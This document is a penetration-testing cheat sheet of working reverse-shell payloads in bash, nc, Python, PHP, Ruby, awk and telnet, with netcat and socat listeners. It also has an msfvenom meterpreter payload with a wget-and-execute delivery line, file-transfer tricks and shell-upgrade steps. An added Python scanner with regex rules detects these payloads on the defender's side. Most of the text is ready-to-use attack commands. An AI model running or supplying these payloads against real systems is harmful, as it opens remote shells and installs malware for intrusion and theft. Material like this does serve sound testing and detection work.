Reverse Shell

Listeners

nc -nlvp <port>
nc -nlvp <port> <<< <cmd>
socat file:`tty`,raw,echo=0 tcp-listen:<port>
socat file:`tty`,echo=0,raw  udp-listen:<port>

Payloads

awk
awk 'BEGIN {s = "/inet/tcp/0/<LHOST>/<LPORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
nc (GAPING_SECURITY_HOLE disabled)
nc <ip> <port> -e /bin/bash
nc <ip> <port> -c /bin/bash
mkfifo + nc
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> <port> >/tmp/f
mknod + nc
mknod backpipe p && nc <ip> <port> 0<backpipe | /bin/bash 1>backpipe
TCP socket
/bin/bash -i > /dev/tcp/<ip>/<port> 0<&1 2>&1
PHP
php -r '$sock=fsockopen("<ip>",<port>);exec("/bin/bash -i <&3 >&3 2>&3");'
Telnet (reuses the backpipe FIFO created with mknod above)
telnet <ip> <port> 0<backpipe | /bin/bash 1>backpipe
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Python (UDP; pair with the socat UDP listener above, not tested)
python -c 'import socket,pty,os;lhost = "<ip>"; lport = <port>; s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); s.connect((lhost, lport)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); os.putenv("HISTFILE","/dev/null"); pty.spawn("/bin/bash"); s.close()'
Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
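Added example from the defender's side, not part of the original cheat sheet: a small Python scanner that flags process command lines matching the payload families listed above (socket-wired shells, FIFO-to-nc pipes, dup2 into an interpreter). The sample command lines are constructed for this example with a made-up listener 10.0.0.1:4444; the rule names are our own labels, and scan_proc() assumes a Linux /proc layout.

```python
from __future__ import annotations

import glob
import re

# Constructed sample command lines, as a process-auditing collector might record
# them: the reverse-shell one-liners from this cheat sheet (placeholders filled
# with a made-up listener 10.0.0.1:4444) mixed with ordinary admin commands.
SAMPLE_CMDLINES = [
    "/bin/bash -i > /dev/tcp/10.0.0.1/4444 0<&1 2>&1",
    "nc 10.0.0.1 4444 -e /bin/bash",
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f",
    """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'""",
    "ssh -p 2222 admin@10.0.0.5 'cat /var/log/syslog'",
    """python3 -c 'import pty; pty.spawn("/bin/bash")'""",
    "nc -nlvp 4444",
    "tar -czf /tmp/backup.tgz /etc",
    """php -r '$sock=fsockopen("10.0.0.1",4444);exec("/bin/bash -i <&3 >&3 2>&3");'""",
    """ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'""",
    """awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1/4444"; while(42) { print "x" |& s }}' /dev/null""",
]

# Rule names are our own labels (hypothetical, not from any vendor ruleset).
# Each regex keys on the structural tell of one payload family from the page:
# a shell whose stdio is wired to a socket, or a FIFO feeding nc/telnet.
REVERSE_SHELL_RULES = [
    ("bash-dev-tcp", re.compile(r"/dev/(tcp|udp)/")),
    ("nc-exec", re.compile(r"\bnc(at)?\b.*\s-[ce]\s+/bin/(ba)?sh")),
    ("fifo-nc", re.compile(r"\b(mkfifo|mknod)\b.*\b(nc|ncat|telnet)\b")),
    ("python-dup2-shell", re.compile(r"\bpython[23]?\b.*socket.*dup2.*(/bin/(ba)?sh|pty\.spawn)")),
    ("pty-spawn", re.compile(r"pty\.spawn\(")),
    ("php-fsockopen-exec", re.compile(r"fsockopen\(.*\b(exec|system|shell_exec|popen|proc_open)\(")),
    ("ruby-tcpsocket-exec", re.compile(r"TCPSocket\b.*\bexec\b")),
    ("awk-inet-tcp", re.compile(r"/inet/(tcp|udp)/")),
]


def classify(cmdline: str) -> list[str]:
    """Return the names of every rule the command line matches (empty if nothing fires)."""
    return [name for name, rx in REVERSE_SHELL_RULES if rx.search(cmdline)]


def scan(cmdlines) -> dict[int, list[str]]:
    """Map each flagged line's index to its matching rule names; unflagged lines are omitted."""
    return {i: hits for i, line in enumerate(cmdlines) if (hits := classify(line))}


def scan_proc() -> dict[str, list[str]]:
    """Linux only (assumption): apply the rules to the live process table via /proc/*/cmdline.

    Returns {pid: [rule names]} for every process whose command line fires a rule.
    """
    findings: dict[str, list[str]] = {}
    for path in glob.glob("/proc/[0-9]*/cmdline"):
        try:
            with open(path, "rb") as fh:
                # argv entries are NUL-separated in /proc; join them with spaces
                cmdline = fh.read().replace(b"\0", b" ").decode("utf-8", "replace").strip()
        except OSError:
            continue  # process exited or is not readable by this user
        if hits := classify(cmdline):
            findings[path.split("/")[2]] = hits
    return findings


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_CMDLINES).items():
        print(f"[{', '.join(hits)}] {SAMPLE_CMDLINES[idx][:70]}")
```

Command-line matching like this is a cheap first filter, not a complete control: a payload delivered as `base64 -d | sh` or typed into an interpreter reading from stdin never shows these strings in argv. Pair it with execve auditing and with network telemetry that flags shell and interpreter processes holding outbound sockets, which is the tell every variant on this page shares.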

Drop a file

Payloads
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=<ip> lport=445 -f elf -o test.elf
Delivery
wget <ip/domain>/test.elf -O /tmp/<name> && chmod 777 /tmp/<name> && /tmp/<name> && rm /tmp/<name>

Copy (base64)

1) cat file2upload | base64
2) Create the file on the target and paste the base64 content into it (alternatively, serve it over SMB with impacket-smbserver w00t .)
3) cat fileWithBase64Content | base64 -d > finalBinary

Interactive reverse shell

https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
https://netsec.ws/?p=337

nc -nlvp <port>                                  # local listener
python -c 'import pty; pty.spawn("/bin/bash")'   # in the remote shell
[CTRL + Z]                                       # background the shell locally
echo $TERM                                       # local: note the terminal type
stty -a                                          # local: note rows and columns
stty raw -echo                                   # local
fg                                               # local: bring the shell back
reset                                            # in the remote shell
export SHELL=bash
export TERM=xterm-256color    # according to "echo $TERM"
stty rows 38 columns 116      # according to "stty -a"

stty -raw echo                # local, after the shell exits, to restore the terminal